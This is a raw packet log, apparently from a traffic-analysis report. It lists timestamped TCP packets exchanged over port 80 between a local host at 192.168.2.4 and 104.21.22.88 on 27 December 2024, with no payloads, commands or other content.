                                    Dec 27, 2024 06:22:15.820585966 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820601940 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820617914 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820641041 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820643902 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820657015 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820662022 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820673943 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820689917 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820707083 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820708036 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820723057 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820740938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820749044 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820758104 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820769072 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820782900 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.820806980 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821512938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821528912 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821546078 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821561098 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821567059 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821568966 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821585894 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821602106 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821604013 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821619987 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821624041 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821635962 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821641922 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821655035 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821671963 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821682930 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821686983 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821705103 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.821722984 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.821809053 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822465897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822508097 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822524071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822540998 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822556019 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822556973 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822572947 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822590113 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822594881 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822607040 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822623014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822638035 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822644949 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822644949 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822655916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822671890 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822689056 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822701931 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822706938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.822746992 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.822746992 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.823412895 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823429108 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823443890 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823466063 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823477030 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.823482037 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823498011 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823513031 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823514938 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.823528051 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823544025 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823544025 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.823559999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823576927 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823580027 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.823594093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823606014 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.823611021 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.823648930 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824352026 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824373007 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824388981 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824408054 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824423075 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824430943 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824438095 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824455023 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824457884 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824470997 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824479103 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824487925 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824500084 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824505091 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824521065 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824537039 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824552059 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.824557066 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824557066 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.824609041 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825196981 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825225115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825239897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825256109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825269938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825273037 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825285912 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825290918 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825303078 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825328112 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825340986 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825345039 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825361013 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825361013 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825377941 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825392962 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825407982 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825416088 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825423956 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.825433016 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.825469971 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.826201916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826219082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826235056 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826251984 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826267958 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826272964 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.826283932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826293945 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.826298952 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826314926 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826329947 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.826330900 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826348066 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826351881 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.826395988 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.826944113 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826961040 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826975107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.826994896 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827012062 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827027082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827028036 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827028036 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827044010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827049971 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827060938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827078104 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827094078 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827095032 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827110052 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827119112 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827126026 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827142000 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827156067 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827159882 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827194929 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827667952 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827683926 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827738047 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827797890 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827814102 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827851057 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.827944994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827963114 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.827994108 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.828763962 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.828815937 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.828862906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.829791069 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.829843044 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.829958916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.830802917 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.830854893 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.830900908 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.831768990 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.831825018 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.831871033 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.832772017 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.832818031 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.832854986 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.833765984 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.833820105 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.833862066 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.834743977 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.834794998 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.834906101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.835753918 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.835818052 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.835866928 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.836776972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.836829901 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.836877108 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.837738037 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.837791920 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.837816000 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.838752031 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.838851929 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.838920116 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.839735031 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.839843035 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.839901924 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.840739965 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.840852022 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.840900898 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.841763020 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.841861010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.841907978 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.842720032 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.842772961 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.842824936 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.843727112 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.843787909 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.843827009 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.844715118 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.844788074 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.844830990 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.845726967 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.845813990 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.845823050 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.846699953 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.846782923 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.846823931 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.847718954 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.847783089 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.847826958 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.848706007 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.848772049 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.848813057 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.849687099 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.849761009 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.849803925 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.850687981 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.850756884 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.850797892 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.851686954 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.851746082 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.851803064 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.852718115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.852781057 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.852838039 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.853677034 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.853809118 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.853864908 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.854728937 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.854813099 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.854835987 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.855688095 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.855761051 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.855832100 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.856694937 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.856753111 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.856795073 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.857686043 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.857738018 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.857789993 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.858676910 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.858730078 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.858777046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.859678984 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.859750032 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.859791040 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.860677958 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.860743046 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.860786915 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.861665010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.861774921 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.861809015 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.862644911 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.862725019 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.862729073 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.863662958 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.863718987 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.863760948 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.864661932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.864748955 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.864772081 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.865644932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.865714073 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.865746021 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.866621971 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.866686106 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.866733074 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.867625952 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.867675066 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.867739916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.868623972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.868684053 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.868725061 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.869617939 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.869738102 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.869741917 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.870634079 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.870685101 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.870753050 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.871625900 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.871676922 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.871767044 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.923118114 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.938949108 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.938987017 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.939048052 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.939508915 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.939620972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.939671993 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.940411091 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.940526009 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.940622091 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.941416025 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.941524029 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.941576958 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.942406893 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.942467928 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.942552090 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.943413019 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.943561077 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.943614960 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.944402933 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.944526911 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.944576979 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.945404053 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.945514917 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.945570946 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.946392059 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.946528912 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.946582079 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.947400093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.947501898 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.947559118 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.948385000 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.948503971 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.948653936 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.949384928 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.949491024 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.949542046 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.950390100 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.950495005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.950548887 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.951387882 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.951491117 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.951543093 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.952389002 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.952487946 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.952539921 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.953439951 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.953526974 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.953600883 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.954360962 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.954503059 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.954557896 CET4973080192.168.2.4104.21.22.88
